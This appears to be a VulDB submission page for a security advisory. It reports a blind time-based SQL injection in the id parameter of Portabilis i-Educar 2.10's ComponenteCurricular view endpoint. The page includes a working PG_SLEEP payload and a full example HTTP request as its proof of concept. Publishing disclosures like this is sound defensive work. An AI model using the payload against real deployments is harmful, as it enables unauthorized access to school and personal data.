| 제목 | Portabilis i-Educar 2.10 SQL Injection |
|---|
| 설명 | SQL Injection (Blind Time-Based) Vulnerability in id Parameter on module/ComponenteCurricular/view Endpoint
Summary
A SQL Injection vulnerability was identified in the /module/ComponenteCurricular/view endpoint of the i-educar application, specifically in the id parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.
Details
Vulnerable Endpoint: /module/ComponenteCurricular/view
Parameter: id
The application fails to properly validate and sanitize user input in the id parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.
PoC
Step by Step:
Access endpoint /intranet/educar_componente_curricular_lst.php and choose (click on) any register. For this example was choosen "Ensino Religioso" register which id = 8. In the vulnerable endpoint, the payload must be inserted after id number (e.g. “id=8payload”)
image 1: https://github.com/KarinaGante/KG-Sec/raw/main/CVEs/images/SQLi14.png
image 2: https://github.com/KarinaGante/KG-Sec/raw/main/CVEs/images/SQLi15.png
Payload:
%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ
Decoded Payload:
' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ
This payload triggers a 5-second delay in the server response, demonstrating that the parameter is vulnerable to blind time-based SQL injection.
Example Request:
GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1
Host: localhost:8086
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/x.x.x.x Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
Connection: keep-alive
Normal Request:
image 3: https://github.com/KarinaGante/KG-Sec/raw/main/CVEs/images/SQLi16.png
SQLi Request:
image 4: https://github.com/KarinaGante/KG-Sec/raw/main/CVEs/images/SQLi17.png
Observe the increased server response time, confirming that the injected SQL command was executed.
Impact
Unauthorized data access: Reading sensitive information such as credentials, personal data, or configuration details
Database enumeration: Extracting database schema, tables, and column details
Data manipulation: Adding, modifying, or deleting database records.
Denial of Service (DoS): Using time-based queries to impact system availability.
Potential escalation to RCE: If combined with other vulnerabilities and specific database features.
Finder
Discovered by Karina Gante. |
|---|
| 원천 | ⚠️ https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/26.md |
|---|
| 사용자 | karinagante (UID 88113) |
|---|
| 제출 | 2025. 09. 18. AM 01:52 (9 개월 ago) |
|---|
| 모더레이션 | 2025. 09. 22. AM 07:35 (4 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 325207 [Portabilis i-Educar 까지 2.10 view 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|